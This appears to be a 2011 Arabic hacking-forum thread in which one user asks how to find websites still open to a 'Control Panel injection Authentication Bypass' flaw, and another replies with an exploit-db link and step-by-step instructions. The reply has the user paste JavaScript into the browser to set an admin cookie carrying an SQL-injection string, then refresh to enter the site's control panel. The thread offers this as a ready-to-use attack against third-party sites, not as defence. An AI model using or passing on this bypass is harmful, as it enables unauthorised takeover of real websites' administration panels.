عن ثغرة Control Panel injection Authentication Bypass

خطير. · 01-04-2011, 04:29 PM

السسسلام عليكم

اخواني حبيت استفسر عن هذه الثغره

Control Panel injection Authentication Bypass

هل مازالت موجوده وكيف البحث عن مواقع مصابة بهذه الثغره

تحياتي لكم

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC uk eyvm Control Panel injection Authentication Bypass

KaLa$nikoV · 01-05-2011, 11:43 AM

http://www.exploit-db.com/exploits/14494/

-------

[1] Go to the URL:
http://www.xxxxx.net/index.php?task=login

[2] Apply these ******:

Javascript:********.****** = "ava_username=admin;"
Javascript:********.****** = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to main Page:

[4] Enjoy

--------
1- روح لوحه التحكم
2- حط الكود الي قدامك بالمتصفح مكان الرابط وانتر وبعد اعمل رفرش تلقى نفسك بداخل لوحه التحكم

.......
موفق